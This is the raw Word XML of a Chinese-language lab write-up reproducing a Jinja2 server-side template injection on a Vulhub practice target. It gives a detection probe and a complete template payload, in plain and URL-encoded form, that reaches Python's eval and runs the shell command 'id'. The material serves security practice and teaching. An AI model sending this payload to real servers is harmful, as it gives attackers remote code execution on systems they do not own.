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E2" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A33E2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、V</w:t>
      </w:r>
      <w:r>
        <w:t>ulhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问8</w:t>
      </w:r>
      <w:r>
        <w:t>000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33E2C" w:rsidRDefault="00A33E2C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B3C1792" wp14:editId="7C160708">
            <wp:extent cx="5274310" cy="1044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2C" w:rsidRDefault="00A33E2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A33E2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33E2C" w:rsidRDefault="00A33E2C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00B66381">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://ip/?name={{233*233}}，得到</w:t>
        </w:r>
        <w:r w:rsidRPr="00B66381">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidRPr="00B66381">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>4289</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则存在漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33E2C" w:rsidRDefault="00A33E2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6548F417" wp14:editId="541C5D00">
            <wp:extent cx="5274310" cy="1766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2C" w:rsidRDefault="00A33E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298087</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="524637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E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t>{% for c in [].__class__.__base__.__subclasses__() %}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t>{% if c.__name__ == 'catch_warnings' %}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t xml:space="preserve">  {% for b in c.__init__.__globals__.values() %}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t xml:space="preserve">  {% if b.__class__ == {}.__class__ %}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t xml:space="preserve">    {% if 'eval' in b.keys() %}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t xml:space="preserve">      {{ b['eval']('__import__("os").popen("id").read()') }}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t xml:space="preserve">    {% endif %}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t xml:space="preserve">  {% endif %}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t xml:space="preserve">  {% endfor %}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t>{% endif %}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t>{% endfor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.45pt;width:413.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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t>{% for c in [].__class__.__base__.__subclasses__() %}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t>{% if c.__name__ == 'catch_warnings' %}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t xml:space="preserve">  {% for b in c.__init__.__globals__.values() %}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t xml:space="preserve">  {% if b.__class__ == {}.__class__ %}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t xml:space="preserve">    {% if 'eval' in b.keys() %}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t xml:space="preserve">      {{ b['eval']('__import__("os").popen("id").read()') }}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t xml:space="preserve">    {% endif %}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t xml:space="preserve">  {% endif %}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t xml:space="preserve">  {% endfor %}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00A33E2C" w:rsidRPr="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t>{% endif %}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00A33E2C" w:rsidRDefault="00A33E2C" w:rsidP="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t>{% endfor %}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2、获取e</w:t>
      </w:r>
      <w:r>
        <w:t>val</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数并执行任意P</w:t>
      </w:r>
      <w:r>
        <w:t>ython</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码的P</w:t>
      </w:r>
      <w:r>
        <w:t>OC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33E2C" w:rsidRDefault="00A33E2C"/>
    <w:p w:rsidR="00A33E2C" w:rsidRDefault="00A33E2C">
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、带入n</w:t>
      </w:r>
      <w:r>
        <w:t>am</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e参数成功回显i</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33E2C" w:rsidRDefault="00A33E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8880AD" wp14:editId="6D2BCD13">
            <wp:extent cx="5274310" cy="1130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257165" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="19685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E2C" w:rsidRDefault="00A33E2C">
                            <w:r w:rsidRPr="00A33E2C">
                              <w:t>http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7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2.75pt;margin-top:14.55pt;width:413.9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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00A33E2C" w:rsidRDefault="00A33E2C">
                      <w:r w:rsidRPr="00A33E2C">
                        <w:t>http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7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33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5C3" w:rsidRDefault="006645C3" w:rsidP="00A33E2C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006645C3" w:rsidRDefault="006645C3" w:rsidP="00A3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5C3" w:rsidRDefault="006645C3" w:rsidP="00A33E2C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006645C3" w:rsidRDefault="006645C3" w:rsidP="00A33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E6"/>
    <w:rsid w:val="006645C3"/>
    <w:rsid w:val="00A33E2C"/>
    <w:rsid w:val="00A516E2"/>
    <w:rsid w:val="00CB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F1C1D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{565D7D18-10A1-444E-84BD-4E9DF2A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E2C"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A33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ip/?name=%7b%7b233*233%7d%7d&#65292;&#24471;&#21040;542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2022-05-25T08:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-25T08:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>